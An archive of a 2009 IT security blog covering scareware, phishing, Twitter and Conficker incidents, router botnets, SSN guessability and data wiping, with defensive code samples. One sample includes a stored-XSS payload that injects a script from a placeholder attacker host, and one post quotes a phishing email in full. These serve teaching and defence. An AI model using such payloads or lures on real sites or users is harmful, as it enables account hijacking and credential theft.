IT Security Blog

16 September 2009

Searches for Patrick Swayze Info Could Lead to Malware


ALERT: Over the next several weeks I will be transitioning the MX Logic IT Security Blog over to the McAfee Avert Labs blog.  Please continue to follow me there. 

Now onto today's blog post :)


Another celebrity death.  Another recycled scareware tactic attempting to lure users into downloading malware by telling them that their PC is infected with a virus.  We saw it after the deaths of Michael Jackson, Farrah Fawcett, and Natasha Richardson earlier this year.  Now the attention of cyber criminals has turned to Monday's death of Patrick Swayze as the soup du jour for malware distribution.

Queries for information on the death of the popular actor may lead to news stories that look legitimate in search results, but following them lands users on a site that looks like this:



This tactic of presenting the user with a window that looks very much like a legitimate Windows dialog has been used many times before in various forms.  The Windows Explorer-like screen also uses geolocation (an IP-to-location lookup) to name the country and city the user is coming from, in an attempt to make the user believe that their data is actively under attack.  Popups with phrases like "Scan procedures finished.  34 Potential aggressive items was found!" and "Your computer remains infected by threats!  They might lead to data loss and file structure damage, and needed to be heal as soon as possible.  Return to Total Security and download it secure to your PC" (sic) also try to convince users that the only way they can protect themselves from infection is by downloading bogus security software.  The broken English is itself a tell, and so is the "scan": a web page cannot scan your hard drive, so a scan that appears inside the browser is just animation.

Clearly scareware is something that cyber criminals have latched onto as a popular method of malware distribution, as it continues to be a recurring and evolving theme.  Conficker/Downadup largely popularized scareware with its success (although it wasn't the first to use it), and now others are riding off that popularity to repurpose it for their own scams.

 

Posted by smasiello at 10:31 AM | Link | 0 comments
10 September 2009

Tune in to Hear About Security Issues Facing Corporate Blogs with Robert Scoble on the SecurityBuzz Podcast


Friday usually gets people excited since it's the countdown to the weekend, but this week we're excited about it because some stellar guests will be participating in the SecurityBuzz podcast.

As you may recall, last week Robert Scoble's WordPress blog, Scobleizer, was hacked. We've asked Scoble and Rob La Gesse, director of customer development at Rackspace, to join us to discuss corporate blogs, the security issues they face, how to prevent them, etc.

The podcast will be posted Friday afternoon so stay tuned. In the meantime, let us know if you have any questions you’d like for us to ask these guys and/or answer during the podcast. You can post them here or send me a note via Twitter - @smasiello.

Posted by smasiello at 3:35 PM | Link | 0 comments
01 September 2009

Looking Ahead Toward the Threat Horizon


In my copious amounts of spare time one of the things that I like to put thought into is where I believe the threat landscape is headed.  Even in just the last 10 years since the Melissa virus (yes, I know viruses extend quite a bit further back than that; I'm just using this as a reference point) we've gone from mass-mailing viruses, to network worms that tear through your network compromising every vulnerable host as quickly as they can, to social engineering tricks that sometimes make it difficult even for the trained professional to tell whether something is real or fake. 

So, the question that I pose to myself is "What's next?"  Taking even just the events of the last decade into account, where are we headed for the next few years?  Some of this is obviously hard to determine because it also involves forecasting what new technologies will be released, but we can start to make some assumptions based on what is available today. 

Since this is a blog post, I'll try to keep this relatively brief.  Maybe it is something that I can submit as an article to some technology pub as a full byline article (Here's a free plug for the folks over at (IN)Secure Magazine, who just released Issue 22 today.  I like them and I've had the opportunity to write for them twice now) at some point soon.

Some things to think about:

-- The Insider Threat
Especially given the current economic conditions and the uneasiness around many offices about whether their companies will remain viable, organizations need to be ever cognizant of the data that is leaving their networks.  Given that the USB 3.0 spec released in November 2008 allows for transfer speeds of about 5 Gb/s, sensitive, proprietary corporate data can be pulled off a company's network and onto a thumb drive faster than ever before.  Couple that with the number of disgruntled employees who either see the writing on the wall for their own jobs or are upset at benefit and wage freezes/cutbacks, and you have a dangerous cocktail for data theft.  We need to put as much focus on protecting our sensitive assets from insiders, who already have far easier access to proprietary data, as we do on keeping external threats at bay.

-- VoIP
Voice over IP (VoIP) technologies are being adopted at an ever-increasing rate, not only in the enterprise space but in the consumer market.  Services like Vonage make it easier than ever for people to have portable phone numbers so that they can be reached at local numbers by family members out of state.  VoIP deployments at organizations are becoming ever more popular as well.  As these technologies become more widely adopted we have started to see hints of what abuse of these tools looks like.  Throwaway phone numbers used to make spam phone calls have become more common, and there are services online that sell throwaway numbers in blocks.  Spammers can use and abuse these numbers just as they do IP addresses now. 

Another thing to watch out for is the compromise of VoIP systems as vulnerabilities in them are disclosed in larger quantities.  Threats like direct voicemail injection will become another method that cyber criminals use to get advertisements delivered to end users.  As the social engineering in these threats improves, they could easily be used to steal personal identities and corporate data. 

-- Mobile Malware
Let's face it.  The phones that we carry in our pockets are little personal computers.  Although they lack the computing power of the quad-core processors now becoming commonplace in personal computers, they are another "always connected" device that people always leave turned on.  I think the only time that I turn mine off on a weekly basis is when we are doing our weekly recording of the Security Buzz podcast, and that is mainly because the GSM buzz wreaks havoc with the microphones (and our Executive Producer's headphones :) ).  As mobile phone manufacturers open up their APIs to developers to create third-party applications, they will need to be ever diligent in their QA processes to make sure that applications containing some form of malware, or opening a trojan backdoor into the device, don't get posted to their distribution channels.  The mobile phone industry is growing by leaps and bounds with the addition of new, better, more feature-rich smartphones entering the market.  The smartphone market is too large a target for cyber criminals to ignore, especially if you consider the value of the data that we now store on these devices.  Secure sandboxing of third-party applications is a must, but that is only a start.  Only hundreds of mobile malware variants exist today (compared with roughly one new PC malware sample every 4 seconds), but that number is slowly growing, and as hackers pay more attention to how they can penetrate mobile devices it is sure to increase.

-- Social Networking
Social networks provide an interesting shift in the information sharing game because the rules that typically govern what personal data people are willing to share seem to have gone out the window.  This has really opened the door for cyber criminals.  With the data that is now available online through social media sites like Facebook, MySpace, and Twitter, criminals can much more easily target attacks at specific individuals or groups of individuals, using data made available via public profiles, or geolocation tools that map your IP address to the town you live in (or near), so that they can deliver compelling content that directs you to malware-infected downloads (à la the Waledac botnet).  The web of trust that exists between users on social networking sites is regularly exploited by hackers taking advantage of the fact that users will click on whatever their friends send them.  It has already been proven that people will click on links and open attachments from people they don't know, so why would they scrutinize more closely content from those they do?

-- Political Hacktivism
Recently cyber criminals have picked up the pace a bit in using online resources like social networking sites to quickly spread political messages, propaganda, and recruiting pitches for their causes.  Given the sensitive nature of political issues and the passion that people have for them, social engineering techniques such as posting highly controversial views on hot-button topics are something cyber criminals will latch onto to get people to react quickly and carelessly, opening attachments or visiting websites that they would normally scrutinize more closely. 


These are only a small sampling of what I believe we will be encountering as we move forward (I didn't even go into the increased prevalence of compromised legitimate web sites, the further use of file sharing services, or calendar spam!), but they are things that we will need to keep top of mind as we look at what threats are coming down the road.  Hackers go where the money is, and the money is where the people are.  So, whether it is Twitter, MySpace, Facebook, email, instant messaging, or our phones, criminals will leverage whatever technology is available; in their eyes the goal is to make money regardless of the technology, and the first person to figure out how to exploit a technology for financial gain gets the lion's share of the notoriety as well as beating defense mechanisms to the punch.
Posted by smasiello at 3:02 PM | Link | 0 comments
21 August 2009

New Phishing Scam Targeting Yahoo Local Advertised Search


Our Threat Operations Center has recently noticed a new phishing campaign attempting to steal login credentials for Yahoo!'s Local Search Marketing tool.  This is similar to the Google AdWords phishing campaign that we reported back in May 2008, which attempted to obtain login credentials for Google's AdWords site from customers.  In this instance the email spoofs a From address at yahoo-inc.com (Yahoo's internal email domain) and tries to convince the user that their account is about to be suspended.  Sounds like just about every other phishing campaign, right?

The phish reads as follows:

Dear Advertiser,

We just want to remind you that, on August 25, 2009, your Local Sponsored Search account will be discontinued. You will be upgraded to a new Sponsored Search account with geo-targeting and other great new features.

Please note the following: In order for us to upgrade your account you need to verify your user/password of your account. Please remember to input your Sponsored Search user and password correctly NOT your email and password.

Please visit the following link to verify your account:
hxxp://onlinemarketingyahoo.com/adui/signin/loadSignin.htm

Sincerely,

Your Partners at Yahoo! Search Marketing Copyright 2009 Yahoo!, Inc. All rights reserved.


Note the generic nature of the introduction, which should generally be one of your first tipoffs that the email is not authentic.  If you have a relationship with a company and they want to send you an important communication, they will use your real name.  Also note the missing period between "onlinemarketing" and "yahoo" in the URL: onlinemarketingyahoo.com is a separately registered domain that has nothing to do with Yahoo!, whereas a host ending in ".yahoo.com" would at least be under Yahoo!'s control.  If you weren't looking closely this could easily be missed (and even if the period were present, the actual URL for Yahoo!'s local advertising tool is "searchmarketing.yahoo.com", not "onlinemarketing.yahoo.com", a point the casual recipient might also miss).

The potential audience being targeted by this email is somewhat limited because it will only make sense to those who are customers of this Yahoo product.  That rarely seems to stop most spammers.
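The domain check described above is easy to automate.  The following is an added example written for this post, not MX Logic or Yahoo! code: it pulls the hostname out of a (possibly "hxxp"-defanged) link and decides whether it is under a legitimate registrable domain, a lookalike that merely contains the brand name, or something else entirely.  The set of legitimate domains is an assumption for the example; the point is the boundary check, since a naive "ends with yahoo.com" test would accept onlinemarketingyahoo.com.

```python
from urllib.parse import urlsplit

# Assumption for this example: the registrable domains the brand actually owns.
LEGIT_DOMAINS = {"yahoo.com", "yahoo-inc.com"}
# Brand strings whose presence in a foreign host is a lookalike signal.
BRAND_TOKENS = ("yahoo",)


def host_of(link):
    """Return the lowercase hostname of a link, accepting defanged 'hxxp' schemes
    and bare hosts without a scheme."""
    link = link.strip()
    if link.lower().startswith("hxxp"):
        link = "http" + link[4:]
    if "://" not in link:
        link = "http://" + link
    host = urlsplit(link).hostname or ""
    return host.rstrip(".").lower()


def is_under(host, domain):
    """True only if host equals domain or is a proper subdomain of it.

    A bare endswith() check would wrongly accept 'notyahoo.com' and
    'onlinemarketingyahoo.com', which is exactly the trick in the phish."""
    return host == domain or host.endswith("." + domain)


def classify_link(link):
    """Return 'legit', 'lookalike' or 'foreign' for the link's host."""
    host = host_of(link)
    if any(is_under(host, d) for d in LEGIT_DOMAINS):
        return "legit"
    if any(tok in host for tok in BRAND_TOKENS):
        return "lookalike"
    return "foreign"


if __name__ == "__main__":
    # The link from the phish quoted above, plus a few constructed variants.
    for url in (
        "hxxp://onlinemarketingyahoo.com/adui/signin/loadSignin.htm",
        "http://searchmarketing.yahoo.com/",
        "https://yahoo.com.evil.example/login",  # constructed lookalike
        "http://example.org/",
    ):
        print(classify_link(url), host_of(url))
```

The "lookalike" result is the one worth alerting on in mail filtering: a host that contains the brand name but is not under the brand's domain is almost never legitimate.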
Posted by smasiello at 2:48 PM | Link | 0 comments
16 July 2009

What Happened to Responsible Disclosure?


As news of the most recent Twitter breach spread and details of what was compromised started to come forth the question that was at the forefront of my mind was "Whatever happened to responsible disclosure?" where you notify the vulnerable party, give them ample time to fix the problem, and if any information is released publicly, it is done after the problem has been confirmed resolved by the vendor.

According to the article on TechCrunch that contains data that was stolen, they "spent much of the last 36 hours talking directly to Twitter about the right way to go about doing that" (where that = the right way to go about releasing the data).  Now I was certainly not privy to those discussions, but I have a hard time believing that they involved Twitter saying "yes, please post the information, but just leave out the secret sauce bits."  I don't understand what criteria TechCrunch used such that they are now the governing authority over what is and is not confidential, or why they feel they have a right to make that call to begin with.  I am disappointed that a purportedly reputable news organization would feel that they have such privilege. 

In a follow up post TechCrunch attempts to justify their actions by pointing to previous cases where they and another news organization had each taken it upon themselves to post sensitive information.  I guess that means that since there is a precedent for something happening that it somehow makes it right?  They also state within this article that they "break big stories."  Obviously, those that break the big stories get the big press, but let's not also forget that a certain level of responsibility is expected as well.  Saying that "others do it too" as justification for doing anything is just plain juvenile. 

Of course, let's not let the person who leaked the information to TechCrunch off the hook either as they are certainly culpable as well.  At this point nobody seems to know who that person is (at least not publicly).  This mystery person submitted the information with the expectation that it would get published.  Otherwise, why send it to a news organization to begin with.  They baited the hook and TechCrunch bit down hard. 
Whether TechCrunch will end up facing any legal action from Twitter remains to be seen.  Twitter might want to consider at least sending TechCrunch a thank you note for at least temporarily turning the stink-eye from this whole mess away from themselves as TechCrunch appears to be getting flamed worse than Twitter, who had the breach to begin with!

Funny how things work sometimes :)
Posted by smasiello at 9:45 PM | Link | 0 comments
15 July 2009

Another Twitter Hack Leads to More Poorly Placed Generalities About Cloud Computing


It looks like the Hack du Jour, Twitter, has had another high profile data breach.

It seems like we have been around the block on this topic before on a couple of occasions, haven't we?

According to TechCrunch, the cause of this most recent data breach wasn't stolen Twitter account credentials obtained through clickjacking exploits or people handing over their logins to look-alike Twitter application sites.  This exploit was far more elementary, and one that Twitter could stand to learn a lesson from on its own account signup form: weak passwords.  According to the TechCrunch article, the password to some of Twitter's publicly facing servers was "password".  Maybe they thought that was too easy for people to guess and that nobody would actually try a password as simple as "password"?  Either way, this is another example of how Twitter needs to take its own security and the security of its users much more seriously.  Strangely enough, repeated lapses in judgment do not appear to have slowed their growth.

The portion of the MSNBC article that I linked to in the first paragraph that irked me the most was in the section titled "Dangers Highlighted" where the author states that "The techniques used by the hackers to obtain access to Twitter highlight the dangers of a broader trend promoted by Google Inc. and others toward storing more data online, instead of on computers under your control."  I couldn't disagree more with this statement.   The missteps by Twitter that have caused their recent compromises are not a result of a lack of standards or good security practices by cloud computing, SaaS, or other off-network service providers.  They are a result of Twitter's poor security practices and Twitter's alone. 

Any service provider, construction outfit, or home business that has its own network equipment needs to ensure that proper precautions have been taken to secure those devices.  That includes changing default passwords and identifiers (like SSIDs on wireless access points) all the way through to keeping those devices up to date on security patches and application updates.  These are not practices that are relevant to cloud computing providers alone.  To insinuate otherwise in an effort to spread FUD against these types of services is downright irresponsible, in my opinion.  We're talking about best practices that need to be employed by everyone, in all industries and form factors.  Perhaps if we did that instead of just talking about it and always looking to point the finger at someone when they make a mistake, we would have fewer people to point fingers at.
Posted by smasiello at 9:28 PM | Link | 0 comments
07 July 2009

New Research Suggests Your SSN is Easily Guessed


Research published yesterday out of Carnegie Mellon University states that the number of possible values for your Social Security number is limited, given publicly available information such as your birthplace and date of birth. 

This is significant because financial and educational institutions (among others) frequently use the SSN either to verify who you are over the phone or as an authentication factor on web sites, which greatly increases the risk of identity theft.  As a side note, the American Health Information Management Association (AHIMA) published an article back in 2006 recommending against using SSNs as an identifier in systems that contain health care data.

According to the research, you "could identify in a single attempt the first five digits for 44 percent of deceased individuals who were born after 1988 and for 7 percent of those born between 1973 and 1988. They were able to identify all nine digits for 8.5 percent of those individuals born after 1988 in fewer than 1,000 attempts".  Where the first five digits of a nine-digit SSN can be identified on the first attempt, this narrows the possibilities for the remaining four-digit serial number down to fewer than 10,000, which is essentially the same as having to guess someone's 4-digit PIN.  Trivial by today's technology standards, especially against any service that lets you submit SSN guesses without rate limiting.  Since the Social Security Administration's Death Master File can be purchased online for about $7,000 (if you live in the US, Canada, or Mexico; about $15,000 otherwise) according to Steve Goldsby's blog, this cost could easily be recouped after only a few identity thefts.  That is pretty good ROI for cyber criminals despite the up-front cost.
Posted by smasiello at 10:55 AM | Link | 0 comments
15 April 2009

What Can We Learn from Twitter's Security Woes?


Just about anyone and everyone who is active on the internet is either using, has used, or at least has heard of Twitter, the micro-blogging service that grew in usage by 752% in 2008 and is poised to grow even more in 2009. 

As we know, where there are users, there are hackers.  Any technology that has grown in popularity at the speed of which Twitter has is certain to become a target for information and money stealing cyber criminals.  As such, Twitter has been the target of several application exploits over the last few months including a Samy-like exploit which would force users to follow you, multiple Clickjacking exploits, and two worms dubbed Mikeyy and Stalkdaily just this past weekend.
Funnily enough, one of the things that is frequently part of the fallout of numerous security exploits is a drop in brand trust and user confidence.  So far, that fallout does not appear to have taken place with Twitter.  At least based on the reported numbers, Twitter's growth does not seem to have been hampered at all despite the numerous security flaws that have been patched over the past 8 months.  Perhaps this is because there hasn't been a serious incident of data theft or widespread malware infection as a result of one of these exploits.  Rest assured, those are coming!

So, what can we learn as a result of Twitter's recent security woes? 

I believe that one of the most important lessons to be learned from Twitter is the need to ensure security is being built into your product from the concept and design phases, not after the code has been consumed by the public.  This is true for online applications like Twitter as well as boxed software that you buy in the stores.  Don't let your customers be your test bed to identify security risks because you can bet that criminals will find them and exploit them before your customers do.  At that point you have put your customers at risk also.  It is far cheaper and less damaging to your corporate brand and reputation if security risks are identified up front, before any code is launched than to try to retrofit security into a live product.

Up to this point the vulnerabilities exposed on Twitter have largely been considered annoyances.  I was unable to find any reports of identity or financial theft as a result of a Twitter exploit, and again perhaps that is why they haven't been placed under the same microscope that Microsoft and Google have been.  Don't take these proof-of-concept quality threats lightly though as they could easily have been much more nefarious than they were.

Let's take the Mikeyy worm as a primary example.  One of the ways that Mikeyy spread was by sending Tweets out under the accounts of infected users, trying to lure their followers to visit the profile of another Twitter user that exploited a site flaw.  Once that page was visited the visitor's account was hijacked and Tweets were sent out as them to their followers, trying to trick them into clicking too.  Rinse and repeat.  In this instance the worm was merely spreading across Twitter to anyone who was fooled into clicking the link in the Tweet.  What if that link had forwarded unsuspecting users to a drive-by malware site that installed malware like Storm or Conficker?  In a previous post we discussed how URL shortening services can hide an underlying threat vector and redirect users to malware drive-by or phishing sites.  Granted, that example isn't one of a specific Twitter flaw, but it is just another thing that users of the popular service need to be on the lookout for.
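The "site flaw" behind Mikeyy was stored cross-site scripting: a profile field that Twitter rendered into its HTML without encoding, so a profile page could carry script that ran in every visitor's session and posted Tweets as them.  The following is an added example written for this post, not Twitter's code, showing the vulnerable rendering pattern beside the hardened one.  The profile data, the attacker.example host and the payload are constructed and inert; the fix is the one the "build security in from the design phase" lesson calls for: validate the URL on input and HTML-encode every user-supplied value at output.

```python
import html
from urllib.parse import urlsplit

# Constructed sample profiles (not real Twitter data). EVIL_PROFILE's "website"
# field breaks out of the href attribute and injects a script tag, the shape of
# payload a stored-XSS worm uses; the script host is a placeholder.
EVIL_PROFILE = {
    "name": "mikeyy",
    "website": '"><script src="http://attacker.example/worm.js"></script><a href="',
}
GOOD_PROFILE = {"name": "alice", "website": "https://example.org/~alice"}


def render_profile_unsafe(profile):
    """Vulnerable: user-controlled data dropped straight into the HTML template."""
    return '<a href="%s">%s</a>' % (profile["website"], profile["name"])


def safe_url(value):
    """Keep only absolute http(s) URLs. Anything else (javascript:, data:, or a
    fragment of markup) becomes the empty string so it can never execute."""
    value = value.strip()
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return ""
    return value


def render_profile_safe(profile):
    """Hardened: validate the URL, then HTML-encode both values at output time.
    quote=True also encodes the double quote, so the attribute cannot be closed
    early even if the validation step is ever loosened."""
    return '<a href="%s">%s</a>' % (
        html.escape(safe_url(profile["website"]), quote=True),
        html.escape(profile["name"], quote=True),
    )


def contains_script(markup):
    """Crude check used to demonstrate the difference: did a <script> tag survive?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_profile_unsafe(EVIL_PROFILE))  # script tag intact: worm runs
    print(render_profile_safe(EVIL_PROFILE))    # empty href, plain-text name
    print(render_profile_safe(GOOD_PROFILE))
```

Two layers are deliberate: the URL validator stops javascript: links that encoding alone would leave clickable, and the output encoding stops anything the validator did not anticipate.  Either one on its own would have been enough to stop this particular worm; both together are what a template engine should do by default.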

In its short existence Twitter has almost single handedly revolutionized how we communicate (in 140 characters or less :) ) online.  Whether you are using Twitter to communicate with friends from school, family, or professionally to keep up on market trends or as another method to increase your brand awareness (a recent report by comScore said that more than 50% of Twitter users are between 25-54 with most users being on the upper end of that scale), Twitter has stormed onto the social media scene and has already become an important part of how people communicate online.  I use it myself.  As such, it creates another avenue by which we need to make sure we educate ourselves and our users about the potential for online threats.
Posted by smasiello at 2:29 PM | Link | 1 comment
31 March 2009

Conficker Fact and FUD, Flaw In Worm Leads to Detection Tool


I am guessing that most people are suffering from Conficker information overload today!  As such, it is very important to be able to separate the Conficker Facts from the FUD.  In case you have not yet seen it, I blogged last week about what I believe will (not) happen when the Conficker.C variant activates tomorrow, April 1st.  Up to this point we still have not yet seen anything that would lead me to believe anything contradictory to that statement.

I read in a couple of places yesterday about a flaw in the C variant of the Conficker worm that makes infected machines on your LAN answer differently from uninfected ones.  According to Dan Kaminsky's blog, Conficker patches the vulnerable NetpwPathCanonicalize() function in memory (the function whose MS08-067 bug it exploits to spread, presumably patched so competing malware can't follow it in), and its patched version behaves differently from the version in both patched and unpatched copies of Windows.  That difference in behavior is what folks like McAfee, Nessus, Qualys, and others are keying on to build scanners that identify infected hosts over the network.

Although a tool is great to identify machines already infected with the Conficker worm, it is more important to emphasize and re-emphasize the importance of patching and multiple defense layers (from out in the cloud all the way down to the network endpoints) to mitigate these types of infections to begin with.  In the interim, if you believe that machines on your network may currently be infected with the latest Conficker variant download the proof of concept scanner and put together a quickly actionable plan to clean these machines up.
Posted by smasiello at 9:28 AM | Link | 1 comment
27 March 2009

Psyb0t Compromising Insecure Home Routers


Word is spreading of a botnet called Psyb0t that is going around compromising the home routers of people who have not changed the default login password on those devices.  According to published numbers, around 80,000-100,000 Linksys and Netgear routers have been affected by Psyb0t.  It is important to note that a couple of criteria must be met before your router can be exploited by Psyb0t.  First, the router must be a MIPS device (x86 devices are not vulnerable to Psyb0t).  Second, it has to be configured to be administered remotely (from the internet, not the local LAN), and third, it needs to be using the default password that the device was originally configured with (a common insecure practice).

Although Psyb0t is the first botnet alleged to be exploiting home routers, the concept of compromising routers with default passwords is not a new one.  One of the things that I have the honor of doing as part of my job is a quarterly section for SC Magazine called the "Threat of the Month".  The piece that I submitted for their February 2009 issue was on the topic of "drive-by pharming".  Essentially, drive-by pharming is the compromise of home routers that have the "Remote Administration" port enabled so that their settings can be modified from the internet.  If the factory password is still the password used to log in to the device, it is trivial for an attacker to get in and modify your settings to point you at a malicious DNS server, so that traffic to legitimate sites gets redirected to sites set up to phish passwords or inject malware.  That is only one possibility.  Another is that new firmware could be uploaded to turn the device into a bot. 

At their core, these home routers are mini computers, susceptible to attack and infection if proper precautions are not made to protect them.  Default passwords for just about every router made are trivial to find on the internet.  In fact, there are sites setup, like routerpasswords.com, that allow you to select the manufacturer of the router and it will tell you the default password based on their known models.  Be sure to secure all layers of your home or business (plenty of SOHO businesses use standard Cable/DSL modems for their internet connectivity) network.  Never assume that this is being done by someone else or that it is someone else's responsibility.  The default settings on most of the gear that you will buy are setup such that initial access and administration of the device is easy (reduces support costs and angry customers).  From there it is up to you to make sure best practices are followed to keep your network and data secure from outside intrusion.
Posted by smasiello at 10:28 AM | Link | 1 comment
25 March 2009

Staples Sells Returned Hard Drive Loaded with Personal Files


We will touch on this in some more detail during the Security Buzz podcast (Episode #25) that will be recorded this Friday, but I wanted to make a couple of comments here as well about an article that was posted on canada.com regarding a Staples Business Depot Store in Ottawa, Ontario that sold a returned hard drive that still had a number of personal files on it. 
To summarize the article, a woman named Jill Vickers, a retired political science professor from Carleton University, had purchased an external Maxtor Mini portable drive, then attempted to return it to the store after her son noticed that the automatic backup function was not working properly (Vickers had already put a number of her personal files, including some containing sensitive information, on the drive). 

Staples is getting a lot of the bad press here for not properly wiping the drive prior to putting it in the clearance bin.  Staples says that it is standard operating procedure to wipe "anything with memory" prior to it being resold.  So, mea culpa on Staples' part for not following their own policy, and the negative attention is well deserved.  What the article doesn't state is how they wipe the drive.  Is it a quick format, which only rewrites the filesystem's bookkeeping and leaves the file contents on the platters?  Is it an overwrite to a DoD-style standard?  This is left to speculation, but I think it is an important point nonetheless, because I don't think you can expect the average consumer to know the difference or why that difference matters.   

That being said, I believe that Vickers deserves at least part of the blame as well.  If the data she was storing on the drive was important to her and potentially sensitive, she (or her son) should have taken at least basic steps to ensure that it was not readily visible to anyone handling the drive (including the employees of the Staples store she returned it to).  Even if Vickers isn't familiar with the different data deletion standards out there, doing a "Select All" and then "Delete" on the files is better than nothing, though only marginally: deleting a file removes the directory entry, not the data, and freely available undelete tools will bring it right back.  Overwriting the files (or, better, encrypting the drive from the day it is taken out of the box) is what actually keeps the contents away from the next owner.
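For the "overwrite, don't just delete" point, here is an added example (mine, not from the article or any vendor) that overwrites a file in place with random bytes and fsyncs before unlinking it, with a helper that builds a throwaway sample file so it runs offline.  The caveats are part of the example: on SSDs, journaling or copy-on-write filesystems, and drives that remap bad sectors, an in-place overwrite is not guaranteed to reach every old copy of the data, which is why whole-drive encryption from the start, or a full-device wipe before resale, is the reliable answer.

```python
import os
import secrets
import tempfile

CHUNK = 1 << 20  # overwrite in 1 MiB pieces so large files don't sit in memory


def overwrite_and_delete(path, passes=1):
    """Overwrite the file at `path` in place with random bytes `passes` times,
    fsync each pass so the new blocks reach the device, then unlink it.

    Returns the total number of bytes written (file size * passes).
    Assumption: the filesystem writes in place. Journaling/COW filesystems and
    SSD wear levelling can leave stale copies that this cannot reach."""
    size = os.path.getsize(path)
    written = 0
    with open(path, "r+b", buffering=0) as fh:
        for _ in range(passes):
            fh.seek(0)
            remaining = size
            while remaining > 0:
                n = min(CHUNK, remaining)
                fh.write(secrets.token_bytes(n))
                written += n
                remaining -= n
            fh.flush()
            os.fsync(fh.fileno())
    os.remove(path)
    return written


def make_sample_file(content=b"sensitive data " * 600):
    """Create a throwaway file with constructed sample content; returns its path."""
    fd, path = tempfile.mkstemp(prefix="wipe-demo-")
    with os.fdopen(fd, "wb") as fh:
        fh.write(content)
    return path


def demo(passes=2):
    """Build a sample file, wipe it, and report whether the bookkeeping adds up."""
    path = make_sample_file()
    size = os.path.getsize(path)
    written = overwrite_and_delete(path, passes=passes)
    return written == size * passes and not os.path.exists(path)


if __name__ == "__main__":
    print("wiped:", demo())
```

One pass of random data is enough on modern magnetic drives; the multi-pass patterns in older standards date from a different recording density.  The limitation that matters is not the pass count but whether the overwrite lands on the same blocks, which is exactly what a quick format or a plain delete never attempts.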

I guess the best takeaway from this experience for the rest of us is that we should always take whatever steps are necessary and possible to protect our own sensitive data from exposure, because even when others who handle our information have protection policies in place, you cannot rely on those policies being followed.

Posted by smasiello at 10:28 AM | Link | 0 comments
13 March 2009

The Great Browser Security Debate


I have been starting to feel like I have hardly been in the office over the past month.  After attending MAAWG in San Francisco for a week in mid-February I was in town for a week and a half before going on an extended vacation/business trip to Orlando for InfoSec World 2009 and some time visiting my wife's family.  I am finally back in town and expect to be so for about the next month until RSA rolls around in late April so expect to see regular blog updates rolling out again.

I wanted to take a few minutes to talk about something that has kind of been bothering me lately.  It is something that I have been hearing more and more of in passing conversation as it relates to browser security, in particular between Firefox and Internet Explorer.  Similar to the debates that have been raging for a few years now between the "security" of Apple's OS X (and previous versions) as compared to Microsoft Windows are debates about whether Firefox is a more secure browser than Internet Explorer.

Is it, really?  Or is it just a matter of perception?

At the end of the day, the level of security of any application installed on our computers is a combination of the vendor's ability to release timely updates to address new security issues, and the user's ability/willingness to install those updates.  The discussion about application security is completely irrelevant if users do not install the updates that the vendor provides.

Take this recent analysis of the Conficker worm/botnet as an example.  According to the report, more than 90% of the users who got infected with Conficker got infected while using Internet Explorer 6, the default browser that comes with Windows XP.  Windows XP is also the OS that has the highest concentration of infected Conficker users, but that is to be expected as it is currently the most deployed Windows OS version.  What this tells me is that many users who are running Internet Explorer 6 are not keeping it up to date with updates and patches.  This is also somewhat to be expected because the largest concentration of infections is in countries like China, Brazil, Russia, and India, which also have some of the highest numbers of pirated copies of Windows in the world.  You could argue that this might not be the best example of browser security because Conficker is an exploit for an OS level vulnerability, but the reasoning is still sound in that if you aren't applying OS patches you likely aren't patching your browser either.  If you aren't familiar with the "insecurity iceberg" report, I would recommend it.  It is a good read as it outlines browser and plugin usage across many different data cross-sections to illustrate that browser security is about more than just the browser.  It also includes the many plugins that are available such as Adobe Flash, Java, Apple Quicktime, and Adobe PDF Reader.

So, to go back to my original question, is Firefox really more secure than Internet Explorer?  In addition to my previous argument about patching, I believe this also comes down to an issue of perception.  For example, Firefox releases security updates more frequently than Internet Explorer.  Does that make it more secure or less secure?  Additionally, Firefox has a "nagware" type of feature where it regularly throws popups at you when a new version is available encouraging you to upgrade to the latest and greatest version of the browser.  This gives the impression to the user that they are being kept safer.  Second, Firefox has an active community of developers creating plugins for Firefox that help create additional security features on top of what the browser already provides.  Neither Firefox nor IE have any native protection against what is known as Clickjacking.  With Noscript, a plugin available for Mozilla based browsers like Firefox (et al), Clickjacking protection can be added.  IE currently has no protection available although it is being planned for IE 8.  Another security threat that I have written about previously is the danger that can be introduced by URL abbreviation services like TinyURL and SnipURL.  Firefox has a plugin that will allow users to preview where these abbreviated URLs will really take the user before they click the link.  URL abbreviation services are being used more and more by phishers and malware creators to trick users into clicking on legitimate looking links and redirecting them to malicious web sites.  So, there are security related addons that users can plug into their browsers if you know what the good, actively maintained ones are and know where to look, but this functionality isn't native to the browser and leaves the user with having yet even more software to have to update.

You could make analogies between the OS X and Windows debate here too.  Apple users claim they don't have the malware problem that Windows users have.  In sheer volume of released exploits, this is certainly true, however you are also dealing with a much smaller market share.  Is the reason that Firefox exploits haven't been more widely targeted that they just don't have the market share to support the effort on the part of cyber criminals? 

My point is that there are compelling arguments on both sides of the browser security debate, but at the end of the day the onus is still on the user to make sure their software (including both browser and plugins!) is patched regularly, and that they are employing additional security measures like anti-virus and outbound traffic blocking firewalls to reduce their risk.  More online threats are moving to the browser every day, so having multiple layers of defenses in place at different points of the network remains your best method to minimize risk.
Posted by smasiello at 1:00 PM | Link | 4 comments
26 January 2009

Data Breaches, Job Loss, and Fraud! Oh My!


Last week Heartland Payment Systems Inc reported a data breach of over 100 million credit card numbers and cardholder names.  Monster.com is now also reporting a compromise of passwords, user IDs, names, email addresses, and other PII of an undisclosed number of accounts and is advising all of its users to change their passwords immediately.  It's too bad that most of monster.com's users only regularly access their accounts when they are actually looking for a job which means that many may never get the message or take the time to update their password.  This leaves a lot of accounts as wide open opportunities for identity and data theft.

Combine all of this news with this report on CNN Money that over 71,400 jobs were lost today alone (when I last looked at the report it was 68,000 so the number is getting larger as the day wears on!) and we have a dangerous cocktail for fraud and fraud victims!

So, it is a given that there will be more (and already has been) fraudulent activity related to the monster.com and Heartland breaches.  The bigger problem that comes out of this is that we now have over 71,400 people trying to figure out how they are going to support their families and themselves while they look for new employment.

